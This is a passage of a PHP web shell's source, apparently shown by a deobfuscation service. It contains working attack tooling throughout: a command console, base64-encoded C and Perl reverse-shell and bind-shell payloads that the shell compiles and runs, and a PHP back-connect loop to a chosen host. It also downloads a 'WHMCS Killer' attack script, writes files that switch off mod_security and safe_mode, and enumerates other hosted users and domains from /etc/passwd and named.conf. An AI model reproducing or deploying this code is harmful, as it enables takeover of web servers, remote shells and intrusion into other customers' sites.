cmds.push(cmd); cmds.push("");
cur = cmds.length-1;
} </script>';
echo '<center><h1>Console</h1></center><div class=content><center><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
foreach ($GLOBALS["aliases"] as $n => $v) {
if ($v == "") {
echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>';
continue;
}
echo '<option value="' . htmlspecialchars($v) . '">' . $n . "</option>";
}
if (empty(${"\x5F\x50\x4F\x53\x54"}["ajax"]) && !empty(${"\x5F\x50\x4F\x53\x54"}["p1"])) {
$_SESSION[md5(${"\x5F\x53\x45\x52\x56\x45\x52"}["HTTP_HOST"]) . "ajax"] = false;
}
echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 ' .
($_SESSION[md5(${"\x5F\x53\x45\x52\x56\x45\x52"}["HTTP_HOST"]) . "ajax"] ? "checked" : "") .
'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;" readonly>';
if (!empty(${"\x5F\x50\x4F\x53\x54"}["p1"])) {
echo htmlspecialchars("$ " . ${"\x5F\x50\x4F\x53\x54"}["p1"] . "\n" . ex(${"\x5F\x50\x4F\x53\x54"}["p1"]));
}
echo '</textarea><input type=text name=cmd style="border-top:1;width:100%;" onkeydown="kp(event);">';
echo "</form></div><script>document.cf.cmd.focus();</script></center>";
printFooter();
}
function actionLogout()
{
setcookie(md5(${"\x5F\x53\x45\x52\x56\x45\x52"}["HTTP_HOST"]), "", time() - 3600);
die(
"<html><head><link href='https://fonts.googleapis.com/css2?family=Press+Start+2P' rel='stylesheet'><style>body{ background-color:#000; background-image:url('https://i.imgur.com/4bYhdRM.png'); background-size: 32%; margin-top: 90px}#pageheading{font-size:50px; margin-top: 5px}.loginpage img{width: 500px}input{background: white; border-color:#008000b0; border-radius: 5px; margin-top: 10px; padding:5px;} green {color: #008000;font-family: 'Press Start 2P'; font-size: 60px;}</style></head><body> <center> <div class='loginpage'><center><green>KELUAR DARI WEBSHELL</green></center></body></html>"
);
}
function actionNetwork()
{
printHeader();
$back_connect_c =
"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
$back_connect_p =
"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
$bind_port_c =
"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
$bind_port_p =
"IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
echo '<center><h1>Network tools</h1></center><div class=content><center>
<form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
<br /><br/><span>Back-connect to</span><br/>
Server: <input type=\'text\' name=\'server\' value="' .
${"\x5F\x53\x45\x52\x56\x45\x52"}["REMOTE_ADDR"] .
'"> Port: <input type=\'text\' name=\'port\' value=\'443\' size=\'5\'> Using: <select name="using"><option value=\'php\'>PHP</option><option value=\'bcp\'>Perl</option><option value=\'bcc\'>C</option></select> <input type=submit value=">>">
</form><br> <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;"> <br/><span>Bind port to /bin/sh</span><br/>
Port: <input type=\'text\' name=\'port\' value=\'443\' size=\'5\'> <input type=\'text\' hidden=\'\' value=\'\' name=\'pass\' value=\'\'> Using: <select name="using"><option value=\'bpc\'>C</option><option value=\'bpp\'>Perl</option></select> <input type=submit value=">>">
</form> <br>';
if (isset(${"\x5F\x50\x4F\x53\x54"}["p1"])) {
function cf($f, $t)
{
($w = @fopen($f, "w")) or @function_exists("file_put_contents");
if ($w) {
@fwrite($w, @base64_decode($t)) or
@fputs($w, @base64_decode($t)) or
@file_put_contents($f, @base64_decode($t));
@fclose($w);
}
}
if (${"\x5F\x50\x4F\x53\x54"}["p1"] == "bpc") {
cf("/tmp/bp.c", $bind_port_c);
$out = ex("gcc -o/tmp/bp /tmp/bp.c");
@unlink("/tmp/bp.c");
$out .= ex("/tmp/bp " . ${"\x5F\x50\x4F\x53\x54"}["p2"] . " " . ${"\x5F\x50\x4F\x53\x54"}["p3"] . " &");
echo "<pre class=ml1>$out\n" . ex("ps aux | grep bp") . "</pre>";
}
if (${"\x5F\x50\x4F\x53\x54"}["p1"] == "bpp") {
cf("/tmp/bp.pl", $bind_port_p);
$out = ex(which("perl") . " /tmp/bp.pl " . ${"\x5F\x50\x4F\x53\x54"}["p2"] . " &");
echo "<pre class=ml1>$out\n" . ex("ps aux | grep bp.pl") . "</pre>";
}
if (${"\x5F\x50\x4F\x53\x54"}["p1"] == "bcc") {
cf("/tmp/bc.c", $back_connect_c);
$out = ex("gcc -o /tmp/bc /tmp/bc.c");
@unlink("/tmp/bc.c");
$out .= ex("/tmp/bc " . ${"\x5F\x50\x4F\x53\x54"}["p2"] . " " . ${"\x5F\x50\x4F\x53\x54"}["p3"] . " &");
echo "<pre class=ml1>$out\n" . ex("ps aux | grep bc") . "</pre>";
}
if (${"\x5F\x50\x4F\x53\x54"}["p1"] == "bcp") {
cf("/tmp/bc.pl", $back_connect_p);
$out = ex(
which("perl") .
" /tmp/bc.pl " .
${"\x5F\x50\x4F\x53\x54"}["p2"] .
" " .
${"\x5F\x50\x4F\x53\x54"}["p3"] .
" &"
);
echo "<pre class=ml1>$out\n" . ex("ps aux | grep bc.pl") . "</pre>";
}
if (${"\x5F\x50\x4F\x53\x54"}["p1"] == "php") {
$ip = ${"\x5F\x50\x4F\x53\x54"}["p2"];
$port = ${"\x5F\x50\x4F\x53\x54"}["p3"];
$sockfd = fsockopen($ip, $port, $errno, $errstr);
if ($errno != 0) {
echo "<font color='red'>$errno : $errstr</font>";
} elseif (!$sockfd) {
$result =
"<p>Unexpected error has occured, connection may have failed.</p>";
} else {
fputs(
$sockfd,
" {################################################################} ..:: BackConnect Php By DigiShell#1337 ::..
{################################################################} "
);
$dir = shell_exec("pwd");
$sysinfo = shell_exec("uname -a");
$time = Shell_exec("time");
$len = 1337;
fputs(
$sockfd,
"User ",
$sysinfo,
"connected @ ",
$time,
" "
);
while (!feof($sockfd)) {
$cmdPrompt = "[Green]#:> ";
fputs($sockfd, $cmdPrompt);
$command = fgets($sockfd, $len);
fputs(
$sockfd,
" " .
shell_exec($command) .
"
"
);
}
fclose($sockfd);
}
}
echo "</p>";
}
echo "</div></center>";
printFooter();
}
function actionwhmcs()
{
printHeader();
echo "<center><h1>WHMCS Killer</h1></center>";
echo '<div class="content">';
$full = str_replace(${"\x5F\x53\x45\x52\x56\x45\x52"}["DOCUMENT_ROOT"], "", $dir);
function whmcs($url, $isi)
{
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
if (file_exists("whmcs.php")) {
echo "<center><font color=white><br><br><a href='whmcs.php' target='_blank'>[ Whmcs Killer ]</a><br><br><br></font></center>";
} else {
if (
whmcs(
"https://raw.githubusercontent.com/iamhex/WHMCS-Killer-v4/master/whmcs.php",
"whmcs.php"
)
) {
echo "<center><font color=white><br><br><a href='whmcs.php' target='_blank'>[ Whmcs Killer ]</a><br><br></font></center>";
} else {
echo "<center><font color=red>Failed to create whmcs file</font></center>";
}
}
echo "</div>";
printFooter();
}
function actionBypass()
{
printHeader();
echo "<center><h1>Bypass</h1></center>";
echo '<div class="content">';
echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED BYPASS |</span></h3>| " .
$GLOBALS["cwd"] .
" |<br />";
echo '<a href=# onclick="g(null,null,\'php.ini\',null)"><br>[ PHP.INI ] </a><a href=# onclick="g(null,null,null,\'ini\')">[ .htaccess(Mod) ] </a>';
if (!empty(${"\x5F\x50\x4F\x53\x54"}["p2"]) && isset(${"\x5F\x50\x4F\x53\x54"}["p2"])) {
$fil = fopen($GLOBALS["cwd"] . ".htaccess", "w");
fwrite(
$fil,
'<IfModule mod_security.c>
Sec------Engine Off
Sec------ScanPOST Off
</IfModule>'
);
fclose($fil);
}
if (!empty(${"\x5F\x50\x4F\x53\x54"}["p1"]) && isset(${"\x5F\x50\x4F\x53\x54"}["p1"])) {
$fil = fopen($GLOBALS["cwd"] . "php.ini", "w");
fwrite(
$fil,
"safe_mode = Off disable_functions=none"
);
fclose($fil);
}
echo "<br><br /><br /></div>";
echo "</div>";
printFooter();
}
function actionAdminer()
{
printHeader();
echo "<center><h1>Adminer</h1></center>";
echo '<div class="content">';
$full = str_replace(${"\x5F\x53\x45\x52\x56\x45\x52"}["DOCUMENT_ROOT"], "", $dir);
function adminer($url, $isi)
{
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
if (file_exists("adminer.php")) {
echo "<center><font color=white><br><br><a href='adminer.php' target='_blank'>[ Adminer login ]</a><br><br><br></font></center>";
} else {
if (
adminer(
"https://www.adminer.org/static/download/4.8.0/adminer-4.8.0-en.php",
"adminer.php"
)
) {
echo "<center><font color=white><br><br><a href='adminer.php' target='_blank'>[ Adminer login ]</a><br><br></font></center>";
} else {
echo "<center><font color=red>Failed to create Adminer file</font></center>";
}
}
echo "</div>";
printFooter();
}
function actionJumping()
{
printHeader();
echo "<center><h1>Jumping :D</h1></center>";
echo '<div class="content"><center>';
$i = 0;
echo "<pre><div class='margin: 5px auto;'>";
($etc = fopen("/etc/passwd", "r")) or
(print "<font color=white>Can't read /etc/passwd</font>");
while ($passwd = fgets($etc)) {
if ($passwd == "" || !$etc) {
echo "<font color=white>Can't read /etc/passwd</font>";
} else {
preg_match_all("/(.*?):x:/", $passwd, $user_jumping);
foreach ($user_jumping[1] as $user_Anonymous_jump) {
$user_jumping_dir = "/home/$user_Anonymous_jump/public_html";
if (is_readable($user_jumping_dir)) {
$i++;
$jrw =
'[<font color=white>R</font>]<a href="#" onclick="g(\'FilesMan\',\'' .
$user_jumping_dir .
'/\')">[ ' .
$user_jumping_dir .
" ]</a>";
if (is_writable($user_jumping_dir)) {
$jrw =
'[<font color=white>RW</font>]<a href="#" onclick="g(\'FilesMan\',\'' .
$user_jumping_dir .
'/\')">[ ' .
$user_jumping_dir .
" ]</a> ";
}
echo $jrw;
if (${"\x66\x65\x78\x69\x73\x74\x73"}("posix_getpwuid")) {
$domain_jump = file_get_contents("/etc/named.conf");
if ($domain_jump == "") {
echo " => ( <font color=white>I can't take the domain name</font> )<br>";
} else {
preg_match_all(
"#/var/named/(.*?).db#",
$domain_jump,
$domains_jump
);
foreach ($domains_jump[1] as $dj) {
$user_jumping_url = posix_getpwuid(
@fileowner("/etc/valiases/$dj")
);
$user_jumping_url = $user_jumping_url["name"];
if ($user_jumping_url == $user_Anonymous_jump) {
echo " => ( <u>$dj</u> )<br>";
break;
}
}
}
} else {
echo "<br>";
}
}
}
}
}
if ($i == 0) {
} else {
echo "<br>Total " .
$i .
" Directory " .
gethostbyname(${"\x5F\x53\x45\x52\x56\x45\x52"}["HTTP_HOST"]) .
"";
}
echo "</div></pre>";
echo "</div></center>";
printFooter();
}
function actionmailtest()
{
if (!function_exists("posix_getegid")) {
$user = @get_current_user();
} else {
$uid = @posix_getpwuid(posix_geteuid());
$user = $uid["name"];
}
printHeader();
echo '<center><h1>Mail Test</h1></center><div class="content"><center><br>
<table><form name=em onSubmit="g(null,null,\'ems\',this.mailto.value,this.usere.value);return false;"><tr><td><span>Send to: </span></td>' .
"<td><input type=text style=height:25px; name=mailto value=><input type=hidden name=usere value=$user></td><td><input type=submit value=Send></td></tr></form></table><br>";
if (isset(${"\x5F\x50\x4F\x53\x54"}["p1"])) {
if (${"\x5F\x50\x4F\x53\x54"}["p1"] == "ems") {
$xx = rand();
$from_add = ${"\x5F\x50\x4F\x53\x54"}["p3"] . "@" . php_uname("n");
$to_add = ${"\x5F\x50\x4F\x53\x54"}["p2"];
$subject = "#$xx Result reporting Success";
$message = "Result Report Test - " . $xx . " WORKING !";
$headers =
"From: " .
${"\x5F\x50\x4F\x53\x54"}["p3"] .
"<$from_add> ";
$headers .= "Reply-To: $from_add
";
$headers .= "Return-Path: $from_add ";
$headers .= "X-Mailer: PHP
";
if (mail($to_add, $subject, $message, $headers)) {
echo "Mail Sent to: ${"\x5F\x50\x4F\x53\x54"}[p2]";
} else {
echo "Error Sending Email!";
}
}
}
echo "<br></div><br></center>";
printFooter();
}
function actionSelfRemove()
{
if (${"\x5F\x50\x4F\x53\x54"}["p1"] == "yes") {
if (@unlink(preg_replace("!\(\d+\)\s.*!", "", __FILE__))) {
die("Shell has been removed");
} else {
echo "unlink error!";
}
}
if (${"\x5F\x50\x4F\x53\x54"}["p1"] != "yes") {
printHeader();
}
echo '<center><h1>Suicide</h1></center><div class=content><center><br>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a><br></center></div>';
printFooter();
}
function actionLock()
{
if (${"\x5F\x50\x4F\x53\x54"}["p1"] == "yes") {
printHeader();
echo "<center><h1>Lock Shell</h1></center><div class=content><center><br>";
echo "<b style='background:green;'>SHELL LOCKED SUCCESSFULLY</b><br>";
$mass = fopen("test.txt", "w");
fwrite($mass, "test");
echo "<b style='background:black;text-shadow: 0px 0px 0px;'>Reloading....</b><meta http-equiv='refresh' content='1'><br><br><br>";
printFooter();
}
if (${"\x5F\x50\x4F\x53\x54"}["p1"] != "yes") {
printHeader();
echo '<center><h1>Lock Shell</h1></center><div class=content><center><br><t style="background:blue;text-shadow: 0px 0px 0px;">If You Lock The Shell, No One Can Remove The Shell For A Long Time :D</t><br><a href=# onclick="g(null,null,\'yes\')"><br><b style="background:green;">[ Lock Shell ]</b><br></a><br></center></div>';
printFooter();
}
}
function actionDomain()
{
printHeader();
echo "<center><h1>Local Domains</h1></center><div class=content>";
$KONTOL = @file("/etc/named.conf");
$file = @implode($KONTOL);
$Domain_path = "/var/named";
if (!$file) {
$domains = scandir($Domain_path);
$count = 1;
$dc = 0;
echo "<br><table align=center class=xd width=50% cellpadding=5> <tr class='l1'><td colspan=2>There are : ( <b>" .
count($domains) .
"</b> ) Domains in this Sever.Can't read named.cof .Domains are bypassed actually,you will face problem in symlink. </td></tr> <tr><td>No</td><td>Domain</td><td>User</td></tr>";
foreach ($domains as &$domain) {
if (stripos($domain, ".db")) {
$domain = str_replace(".db", "", $domain);
}
if (strlen($domain) > 6) {
echo "<tr><td>" .
$count++ .
"</td><td><a href='http://" .
$domain .
"' target='_blank'>" .
$domain .
"</a></td><td>User</td></tr>";
}
}
echo "</table><br>";
} else {
$count = 1;
preg_match_all("#named/(.*?).db#", $file, $r);
$domains = array_unique($r[1]);
echo "<br><table align=center class=xd width=59% cellpadding=5> <tr ><td colspan=2 > There are ( <b>" .
count($domains) .
"</b> ) Domains in this Sever.I think you have got something this time yeah!!!.</td></tr> <tr class='l1'><td>No</td><td>Domain</td><td>User</td></tr>";
foreach ($domains as $domain) {
$user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
echo "<tr class='l1'><td>" .
$count++ .
"</td><td><a href='http://" .
$domain .
"' target='_blank'>" .
$domain .
"</a></td><td>" .
$user["name"] .
"</td></tr>";
}
echo "</table><br></div>";
}
printFooter();
}
if (empty(${"\x5F\x50\x4F\x53\x54"}["a"])) {
if (isset($default_action) && function_exists("action" . $default_action)) {
${"\x5F\x50\x4F\x53\x54"}["a"] = $default_action;
} else {
${"\x5F\x50\x4F\x53\x54"}["a"] = "SecInfo";
}
}
if (!empty(${"\x5F\x50\x4F\x53\x54"}["a"]) && function_exists("action" . ${"\x5F\x50\x4F\x53\x54"}["a"])) {
call_user_func("action" . ${"\x5F\x50\x4F\x53\x54"}["a"]);
} ?>
Function Calls
None |
Stats
MD5 | 3fcbcb70df746ecd685876cb9539dc50 |
Eval Count | 0 |
Decode Time | 140 ms |